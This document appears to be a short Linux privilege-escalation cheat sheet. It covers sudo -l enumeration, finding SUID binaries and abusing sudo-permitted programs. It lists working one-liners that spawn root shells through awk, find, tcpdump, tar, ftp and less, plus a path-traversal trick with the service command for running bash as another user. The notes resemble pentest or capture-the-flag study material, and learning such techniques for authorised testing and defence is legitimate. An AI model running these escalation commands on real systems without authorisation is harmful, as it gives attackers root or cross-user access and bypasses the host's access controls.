$ sudo -l
[sudo] password for joe:
Matching Defaults entries for joe on debian-privesc:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User joe may run the following commands on debian-privesc:
(ALL) (ALL) /usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get
Find all SUID Binaries
$ find / -perm -4000 2>/dev/null #Find all SUID binaries
Sneaking Commands at the end of a command
Sometimes we can slide in a shell command at the end of a command
$ sudo awk 'BEGIN {system("/bin/sh")}'
$ sudo find /etc -exec sh -i \;
$ sudo tcpdump -n -i lo -G1 -w /dev/null -z ./runme.sh
$ sudo tar c a.tar -I ./runme.sh a
$ ftp>!/bin/sh
$ less>! <shell_comand>
Running as other user
If there is NOPASSWD sudo permissions we can access with:
$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
We can run as steven with the following:
max@box:~$ sudo -u steven /usr/sbin/service ../../bin/bash
steven@box:/$
GTFOBins
Check GTFOBins - a list of binaries that can be exploited to bypass local restrictions.
